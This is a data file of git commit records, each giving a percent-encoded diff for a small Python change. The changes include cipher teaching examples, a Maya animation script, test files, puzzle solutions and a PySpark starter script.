+import string%0A%0Aletters = string.ascii_uppercase%0A%0Avigenere_table = %7Bletter: %7Bletters%5Bj%5D: letters%5B(i + j) %25 26%5D%0A for j, l in enumerate(letters)%7D%0A for i, letter in enumerate(letters)%7D%0A%0A%0Adef encrypt(text, key):%0A encrypted = %5B%5D%0A for index, letter in enumerate(text):%0A encrypted.append(vigenere_table%5Bletter%5D%5Bkey%5Bindex%5D%5D)%0A return ''.join(encrypted)%0A%0ATEXT = %22ATTACKATDAWN%22%0AKEY = %22LEMONLEMONLE%22%0A%0Aprint encrypt(TEXT, KEY)%0A
|
|
5f63a5ebfe3210fe68df036eef27a51bf431f6a3
|
Initialize transpositionFileCipher
|
books/CrackingCodesWithPython/Chapter10/transpositionFileCipher.py
|
books/CrackingCodesWithPython/Chapter10/transpositionFileCipher.py
|
Python
| 0.00001
|
@@ -0,0 +1,2009 @@
+# Transposition Cipher Encrypt/Decrypt File%0A# https://www.nostarch.com/crackingcodes/ (BSD Licensed)%0A%0Aimport time, os, sys, transpositionEncrypt, transpositionDecrypt%0A%0Adef main():%0A inputFilename = 'frankenstein.txt'%0A # BE CAREFUL! If a file with the outputFilename name already exists,%0A # this program will overwrite that file:%0A outputFilename = 'frankenstein.encrypted.txt'%0A myKey = 10%0A myMode = 'encrypt' # Set to 'encrypt' or 'decrypt'%0A%0A # If the input file does not exist, the program terminates early:%0A if not os.path.exists(inputFilename):%0A print('The file %25s does not exist. Quitting...' %25 (inputFilename))%0A sys.exit()%0A%0A # If the output file already exists, give the user a chance to quit:%0A if os.path.exists(outputFilename):%0A print('This will overwrite the file %25s. (C)ontinue or (Q)uit?' %25 (outputFilename))%0A response = input('%3E ')%0A if not response.lower().startswith('c'):%0A sys.exit()%0A%0A # Read in the message from the input file:%0A fileObj = open(inputFilename)%0A content = fileObj.read()%0A fileObj.close()%0A%0A print('%25sing...' %25 (myMode.title()))%0A%0A # Measure how long the encryption/decryption takes:%0A startTime = time.time()%0A if myMode == 'encrypt':%0A translated = transpositionEncrypt.encryptMessage(myKey, content)%0A elif myMode == 'decrypt':%0A translated = transpositionDecrypt.decryptMessage(myKey, content)%0A totalTime = round(time.time() - startTime, 2)%0A print('%25sion time: %25s seconds' %25 (myMode.title(), totalTime))%0A%0A # Write out the translated message to the output file:%0A outputFileObj = open(outputFilename, 'w')%0A outputFileObj.write(translated)%0A outputFileObj.close()%0A%0A print('Done %25sing %25s (%25s characters).' %25 (myMode, inputFilename, len(content)))%0A print('%25sed file is %25s.' %25 (myMode.title(), outputFilename))%0A%0A%0A# If transpositionCipherFile.py is run (instead of imported as a module),%0A# call the main() function:%0Aif __name__ == '__main__':%0A main()%0A
|
|
fc8a37b63ddc2455afbeeae0a6c2ac911c113337
|
add new
|
maya/python/animation/grapheditor/fit_key_tangent.py
|
maya/python/animation/grapheditor/fit_key_tangent.py
|
Python
| 0.000002
|
@@ -0,0 +1,1156 @@
+#!/usr/bin/env python%0A# -*- coding: utf-8 -*-%0A# %0A# Author : Masahiro Ohmomo%0A# DCC : Maya%0A# Version : 2013 - Latest%0A# Recommend: 2013%0A# %0A# Description.%0A# In this script, do the fitting.%0A# The target is keyframe's tangent.%0A# You should be selected keyframe's of least two index.%0A#%0A# Run command.%0A# import fit_key_tangent%0A# fit_key_tangent.main()%0A#%0A%0Afrom maya import cmds, mel%0Aimport math%0A%0Adef rad_deg(value=0.0, rd=False):%0A%09if rd:%0A%09%09return 180.0*value/3.141592%0A%09else:%0A%09%09return 3.141592*value/180.0%0A%0Adef main():%0A%09names = cmds.keyframe(q=True, n=True)%0A%09for n in names:%0A%09%09frames = cmds.keyframe(n,q=True,sl=True)%0A%09%09values = cmds.keyframe(n,q=True,vc=True,sl=True)%0A%09%09countup = 0%0A%09%09for i in range(len(values)):%0A%09%09%09isLast = False%0A%09%09%09if len(values)-1 == countup:%0A%09%09%09%09x1,y1,x2,y2 = frames%5Bi%5D,values%5Bi%5D,frames%5Bi-1%5D,values%5Bi-1%5D%0A%09%09%09%09isLast=True%0A%09%09%09else:%0A%09%09%09%09x1,y1,x2,y2 = frames%5Bi%5D,values%5Bi%5D,frames%5Bi+1%5D,values%5Bi+1%5D%0A%09%09%09c_tan = rad_deg(math.atan((y2-y1)/(x2-x1)),True)%0A%09%09%09if not isLast:%0A%09%09%09%09cmds.keyTangent(n,e=True,a=True,t=(frames%5Bi%5D,frames%5Bi%5D),oa=c_tan)%0A%09%09%09else:%0A%09%09%09%09cmds.keyTangent(n,e=True,a=True,t=(frames%5Bi%5D,frames%5Bi%5D),ia=c_tan,oa=c_tan)%0A%09%09%09countup += 1
|
|
73fce6afc07496dcc79c2e2763523207c257185b
|
Update the docstring
|
rhea/vendor/device_clock_mgmt_prim.py
|
rhea/vendor/device_clock_mgmt_prim.py
|
from __future__ import absolute_import
import myhdl
from myhdl import instance, delay, always_comb
from rhea.system import timespec
@myhdl.block
def _clock_generate(clock, enable, ticks):
assert len(ticks) == 2
totticks = sum(ticks)
@instance
def mdlclk():
clock.next = False
while True:
if enable:
yield delay(ticks[0])
clock.next = True
yield delay(ticks[1])
clock.next = False
else:
yield delay(totticks)
return mdlclk
@myhdl.block
def device_clock_mgmt_prim(clkmgmt):
""" This is the generic device PLL module
The vendor specific implementations will set the v*_code attribute
for this function to the specific template needed to instantiate
the device primitive in the generated intermediate V*. This
module also creates the clocks for MyHDL simulation when the device
primitives are not available
"""
pif = clkmgmt
(clockin, reset, enable,
clocksout, locked,) = (pif.clockin, pif.reset, pif.enable,
pif.clocksout, pif.locked,)
clocksout.driven = True
locked.driven = True
# for simulation and modeling create the clocks defined
# by the `pll_intf`. For the implementation use verilog_code
clk_inst = []
for ii, clk in enumerate(clkmgmt.clocks):
totalticks = 1/(clk.frequency*timespec)
t1 = int(totalticks // 2)
# @todo: add detailed warnings about qunatization and timespec
# @todo: resolutions (i.e. funny clocks)
ticks = (t1, int(totalticks-t1))
clk_inst.append(_clock_generate(clk, enable, ticks))
print(" clock {} @ {:8.3f} MHz {}".format(
ii, clk.frequency/1e6, ticks))
@always_comb
def clk_assign():
clkmgmt.clockin_out.next = clockin
for ii, clk in enumerate(clkmgmt.clocks):
clocksout.next[ii] = clk
return clk_inst, clk_assign
|
Python
| 0.000061
|
@@ -656,19 +656,18 @@
PLL mod
-ul
e
+l
%0A The
@@ -872,14 +872,13 @@
-module
+block
als
@@ -967,16 +967,59 @@
vailable
+.%0A %0A not convetible, simulation only.
%0A %22%22%22
|
ea7c05a74a7d2b652bff7f3501be8e4a87e9fdef
|
Test suite setting and running all tests
|
proto/parallel/Parallel.py
|
proto/parallel/Parallel.py
|
import subprocess
from time import time
from random import randint
import os
import re
import sys
from robot.libraries import BuiltIn
from robot.utils import html_escape
class Parallel(object):
def __init__(self, runner_script, *arguments):
self._script = runner_script
self._arguments = list(arguments)
self._processes = []
def add_parallel_arguments(self, *args):
self._argumens += list(args)
def run_parallel_robot(self, test_name, *args):
args = self._arguments+list(args)
process = _ParaRobo(test_name, *args)
process.run(self._script)
self._processes.append(process)
return process
def wait_for_parallel_tests_to_be_ready(self, *processes):
failed = []
for process in processes:
rval = process.wait()
process.report()
if rval != 0:
failed.append(process.test)
if failed:
raise AssertionError("Following tests failed:\n%s" % "\n".join(failed))
def wait_for_all_parallel_tests_to_be_ready(self):
self.wait_for_parallel_tests_to_be_ready(*self._processes)
self._processes = []
class _ParaRobo(object):
def __init__(self, test, *args):
self._built_in = BuiltIn.BuiltIn()
id = "%s%s" % (time(), randint(0, 1000000))
self._output = 'output_%s.xml' % id
self._log = 'log_%s.html' % id
self.test = test
self._args = list(args)
self._output_dir = self._built_in.replace_variables("${OUTPUT DIR}")
self._monitor_out = os.path.join(self._output_dir, 'monitor_%s.txt' % id)
self._suite_name = self._built_in.replace_variables("${SUITE_NAME}")
def run(self, script):
with open(self._monitor_out, 'w') as monitor_file:
cmd = [script,
'--outputdir', self._output_dir,
'--output', self._output,
'--report', 'None',
'--log', self._log,
'--monitorcolors', 'off',
'--test', self.test.replace(' ', '').replace('/', '?')]+\
self._args
print "Starting test execution: %s" % " ".join(cmd)
self._process = subprocess.Popen(cmd,
shell=os.sep == '\\',
stdout=monitor_file,
stderr=monitor_file)
def wait(self):
return self._process.wait()
def report(self):
with open(self._monitor_out, 'r') as monitor_file:
monitor_output = monitor_file.read()
try:
os.remove(self._monitor_out)
except:
pass
match = re.search('^Log: (.*)$', monitor_output, re.MULTILINE)
monitor_output = html_escape(monitor_output)
if match:
monitor_output = monitor_output.replace(match.group(1), '<a href="%s#test_%s.%s">%s</a>' % (self._log, self._suite_name, self.test, match.group(1)))
monitor_output = self._add_colours(monitor_output)
print "*HTML* %s" % monitor_output
def _add_colours(self, output):
for name, colour in [("PASS", "pass"), ("FAIL", "fail"), ("ERROR", "fail")]:
output = output.replace(' %s ' % name, ' <span class="%s">%s</span> ' % (colour, name))
return output
|
Python
| 0
|
@@ -347,16 +347,43 @@
ses = %5B%5D
+%0A self._suite = None
%0A%0A de
@@ -471,63 +471,261 @@
def
-run_parallel_robot(self, test_name, *args):%0A arg
+set_suite_for_parallel_tests(self, suite):%0A self._suite = suite%0A%0A def run_parallel_robot(self, test_name, *args):%0A if self._suite is None:%0A self._suite = BuiltIn.BuiltIn().replace_variables('$%7BSUITE_SOURCE%7D')%0A argument
s =
@@ -742,32 +742,46 @@
ments+list(args)
++%5Bself._suite%5D
%0A process
@@ -808,16 +808,21 @@
me, *arg
+ument
s)%0A
@@ -914,16 +914,183 @@
rocess%0A%0A
+ def run_parallel_tests(self, *tests):%0A for test in tests:%0A self.run_parallel_robot(test)%0A self.wait_for_all_parallel_tests_to_be_ready()%0A%0A
def
|
ce1a4f7f55e03429dd0baf219fda71debc7e2ba2
|
add test to backup degraded
|
plenum/test/replica/test_replica_removing_with_backup_degraded.py
|
plenum/test/replica/test_replica_removing_with_backup_degraded.py
|
Python
| 0
|
@@ -0,0 +1,1988 @@
+import pytest%0A%0Afrom plenum.test.replica.helper import check_replica_removed%0Afrom stp_core.loop.eventually import eventually%0Afrom plenum.test.helper import waitForViewChange%0Afrom plenum.test.test_node import ensureElectionsDone%0A%0A%0Adef test_replica_removing_with_backup_degraded(looper,%0A txnPoolNodeSet,%0A sdk_pool_handle,%0A sdk_wallet_client,%0A tconf,%0A tdir,%0A allPluginsPath):%0A %22%22%22%0A 1. Start backup degraded.%0A 2. Check that degraded replicas%0A 3. Start View Change.%0A 4. Check that all replicas were restored.%0A %22%22%22%0A instance_to_remove = 1%0A start_replicas_count = txnPoolNodeSet%5B0%5D.replicas.num_replicas%0A for node in txnPoolNodeSet:%0A node.view_changer.on_backup_degradation(%5Binstance_to_remove%5D)%0A%0A # check that replicas were removed%0A def check_replica_removed_on_all_nodes():%0A for node in txnPoolNodeSet:%0A check_replica_removed(node,%0A start_replicas_count,%0A instance_to_remove)%0A%0A looper.run(eventually(check_replica_removed_on_all_nodes,%0A timeout=tconf.TolerateBackupPrimaryDisconnection * 4))%0A for node in txnPoolNodeSet:%0A assert not node.monitor.isMasterDegraded()%0A assert len(node.requests) == 0%0A%0A # start View Change%0A for node in txnPoolNodeSet:%0A node.view_changer.on_master_degradation()%0A waitForViewChange(looper, txnPoolNodeSet, expectedViewNo=1,%0A customTimeout=2 * tconf.VIEW_CHANGE_TIMEOUT)%0A ensureElectionsDone(looper=looper, nodes=txnPoolNodeSet)%0A # check that all replicas were restored%0A assert all(start_replicas_count == node.replicas.num_replicas%0A for node in txnPoolNodeSet)%0A
|
|
46be255fd0cfaeb2352f2f49b4ec5996a804768d
|
Add unit test for base Handler.
|
test/unit/handler/test_base.py
|
test/unit/handler/test_base.py
|
Python
| 0
|
@@ -0,0 +1,1519 @@
+# :coding: utf-8%0A# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips%0A# :license: See LICENSE.txt.%0A%0Afrom mock import Mock%0A%0Afrom bark.log import Log%0Afrom bark.handler.base import Handler%0Afrom bark.formatter.base import Formatter%0A%0A%0Aclass Concrete(Handler):%0A '''Concrete subclass of abstract base for testing.'''%0A%0A def __init__(self, *args, **kw):%0A '''Initialise handler.'''%0A super(Concrete, self).__init__(*args, **kw)%0A self.data = %5B%5D%0A%0A def output(self, data):%0A '''Output formatted *data*.'''%0A self.data.append(data)%0A%0A%0Aclass Field(Formatter):%0A '''Format log into string of fields.'''%0A%0A def format(self, log):%0A '''Return string of log fields.'''%0A data = %5B%5D%0A for key, value in sorted(log.items()):%0A data.append('%7B0%7D=%7B1%7D'.format(key, value))%0A return ':'.join(data)%0A%0A%0Adef test_handle():%0A '''Test handle method.'''%0A handler = Concrete()%0A log = Log(message='A message')%0A handler.handle(log)%0A%0A assert handler.data == %5Blog%5D%0A%0A%0Adef test_filterer():%0A '''Test filterer prevents output of log.'''%0A deny_all = Mock()%0A deny_all.filter = Mock(return_value=True)%0A%0A handler = Concrete(filterer=deny_all)%0A log = Log(message='A message')%0A handler.handle(log)%0A%0A assert handler.data == %5B%5D%0A%0A%0Adef test_formatter():%0A '''Test formatting of data before output.'''%0A handler = Concrete(formatter=Field())%0A log = Log(message='A message')%0A handler.handle(log)%0A%0A assert handler.data == %5B'message=A message'%5D%0A
|
|
90e96e741bce834e3862a6ed84b22c6d45f64d3f
|
solve 11997
|
UVA/vol-119/11997.py
|
UVA/vol-119/11997.py
|
Python
| 0.999998
|
@@ -0,0 +1,607 @@
+from heapq import heapify, heappush, heappop%0Afrom sys import stdin, stdout%0A%0AI = list(map(int, stdin.read().split()))%0Aii = 0%0A%0Awhile ii %3C len(I):%0A N = I%5Bii%5D%0A%0A sums = I%5Bii+1: ii+1 + N%5D%0A sums.sort()%0A%0A for k in range(1, N):%0A X = I%5Bii+1 + k*N: ii+1 + k*N + N%5D%0A X.sort()%0A%0A q = list(-(s + X%5B0%5D) for s in sums)%0A heapify(q)%0A%0A for s in sums:%0A for j in range(1, N):%0A if s + X%5Bj%5D %3C -q%5B0%5D:%0A heappop(q)%0A heappush(q, -(s + X%5Bj%5D))%0A else: break%0A%0A for i in range(0, N):%0A sums%5BN-i-1%5D = -heappop(q)%0A%0A stdout.write(' '.join(map(str, sums)) + '%5Cn')%0A ii += N*N + 1%0A
|
|
40a83c5fc16facc0fa7e64752dd348c255f07754
|
add C/C++ building tools named `Surtr`
|
cplusplus/chaos/tools/surtr/Surtr.py
|
cplusplus/chaos/tools/surtr/Surtr.py
|
Python
| 0
|
@@ -0,0 +1,1760 @@
+#!/usr/bin/env python%0A# -*- coding: UTF-8 -*-%0A#%0A# Copyright (c) 2016 ASMlover. All rights reserved.%0A#%0A# Redistribution and use in source and binary forms, with or without%0A# modification, are permitted provided that the following conditions%0A# are met:%0A#%0A# * Redistributions of source code must retain the above copyright%0A# notice, this list ofconditions and the following disclaimer.%0A#%0A# * Redistributions in binary form must reproduce the above copyright%0A# notice, this list of conditions and the following disclaimer in%0A# the documentation and/or other materialsprovided with the%0A# distribution.%0A#%0A# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS%0A# %22AS IS%22 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT%0A# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS%0A# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE%0A# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,%0A# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,%0A# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;%0A# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER%0A# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT%0A# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN%0A# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE%0A# POSSIBILITY OF SUCH DAMAGE.%0Afrom __future__ import print_function%0A%0Aimport argparse%0A%0Adef get_options():%0A parser = argparse.ArgumentParser(description='Surtr C/C++ building tool')%0A parser.add_argument('option', nargs='?', help='config%7Cbuild%7Crebuild%7Cclean%7Cremove the project')%0A args = parser.parse_args()%0A return args.option%0A%0Adef main():%0A pass%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
ed57bed46a54bfd531e32a3c69a1f5e465f80662
|
add tests for parse_args
|
tests/test_tcurl.py
|
tests/test_tcurl.py
|
Python
| 0.000001
|
@@ -0,0 +1,904 @@
+from __future__ import absolute_import%0A%0Aimport pytest%0A%0Afrom tchannel.tcurl import parse_args%0A%0A%0A@pytest.mark.parametrize('input,expected', %5B%0A ( # basic case%0A '--host foo --profile',%0A %5B%5B'foo/'%5D, %5BNone%5D, %5BNone%5D, True%5D%0A ),%0A ( # multiple bodies, constant host/headers%0A '--host foo -d 1 2',%0A %5B%5B'foo/', 'foo/'%5D, %5B'1', '2'%5D, %5BNone, None%5D, False%5D%0A ),%0A ( # repeated host and body%0A '--host foo bar -d 1 2',%0A %5B%5B'foo/', 'bar/'%5D, %5B'1', '2'%5D, %5BNone, None%5D, False%5D%0A ),%0A ( # repeated host and body%0A '--host foo -d 1 --headers a b',%0A %5B%5B'foo/', 'foo/'%5D, %5B'1', '1'%5D, %5B'a', 'b'%5D, False%5D%0A ),%0A%5D)%0Adef test_parse_args(input, expected):%0A args = parse_args(input.split())%0A assert list(args.host) == expected%5B0%5D%0A assert list(args.body) == expected%5B1%5D%0A assert list(args.headers) == expected%5B2%5D%0A assert args.profile == expected%5B3%5D%0A
|
|
0a2c658d4d44a5c813b40d5040e101688eeac118
|
Update os.py
|
tendrl/node_agent/persistence/os.py
|
tendrl/node_agent/persistence/os.py
|
from tendrl.common.etcdobj.etcdobj import EtcdObj
from tendrl.common.etcdobj import fields
class Os(EtcdObj):
"""A table of the Os, lazily updated
"""
__name__ = 'nodes/%s/Os/'
node_uuid = fields.StrField("node_id")
os = fields.StrField("os")
os_version = fields.StrField("os_version")
kernel_version = fields.StrField("kernel_version")
selinux_mode = fields.StrField("selinux_mode")
def render(self):
self.__name__ = self.__name__ % self.node_id
return super(Os, self).render()
|
Python
| 0.000001
|
@@ -199,10 +199,8 @@
ode_
-uu
id =
|
dcc5065c7cc4cc167affcbf906eaf81e73fa6d3e
|
Add py solution for 645. Set Mismatch
|
py/set-mismatch.py
|
py/set-mismatch.py
|
Python
| 0.000168
|
@@ -0,0 +1,419 @@
+class Solution(object):%0A def findErrorNums(self, nums):%0A %22%22%22%0A :type nums: List%5Bint%5D%0A :rtype: List%5Bint%5D%0A %22%22%22%0A for i, n in enumerate(nums, 1):%0A while i != n and nums%5Bn - 1%5D != n:%0A nums%5Bi - 1%5D, nums%5Bn - 1%5D = nums%5Bn - 1%5D, nums%5Bi - 1%5D%0A n = nums%5Bi - 1%5D%0A for i, n in enumerate(nums, 1):%0A if i != n:%0A return %5Bn, i%5D%0A
|
|
236a25a159ea523c0b7d3eb009f6bf7df523d37f
|
Add py file used to build win64 binaries
|
pyinstalive_win.py
|
pyinstalive_win.py
|
Python
| 0
|
@@ -0,0 +1,75 @@
+from pyinstalive.__main__ import main%0Aif __name__ == '__main__':%0A main()
|
|
c806eb658e9a7088662fe7d520e3c59be6883099
|
Create pyspark_starter
|
pyspark_starter.py
|
pyspark_starter.py
|
Python
| 0.000001
|
@@ -0,0 +1,970 @@
+from pyspark import SparkConf, SparkContext%0A%0Aconf = SparkConf().setMaster(%22local%5B2%5D%22).setAppName(%22RDD Example%22)%0Asc = SparkContext(conf=conf)%0A%0A# different way of setting configurations %0A#conf.setMaster('some url')%0A#conf.set('spark.executor.memory', '2g')%0A#conf.set('spark.executor.cores', '4')%0A#conf.set('spark.cores.max', '40')%0A#conf.set('spark.logConf', True)%0A%0A# sparkContext.parallelize materializes data into RDD %0A# documentation: https://spark.apache.org/docs/2.1.1/programming-guide.html#parallelized-collections%0Ardd = sc.parallelize(%5B('Richard', 22), ('Alfred', 23), ('Loki',4), ('Albert', 12), ('Alfred', 9)%5D)%0A%0Ardd.collect() # %5B('Richard', 22), ('Alfred', 23), ('Loki', 4), ('Albert', 12), ('Alfred', 9)%5D%0A%0A# create two different RDDs%0Aleft = sc.parallelize(%5B(%22Richard%22, 1), (%22Alfred%22, 4)%5D)%0Aright = sc.parallelize(%5B(%22Richard%22, 2), (%22Alfred%22, 5)%5D)%0A%0Ajoined_rdd = left.join(right)%0Acollected = joined_rdd.collect()%0A%0Acollected #%5B('Alfred', (4, 5)), ('Richard', (1, 2))%5D%0A
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.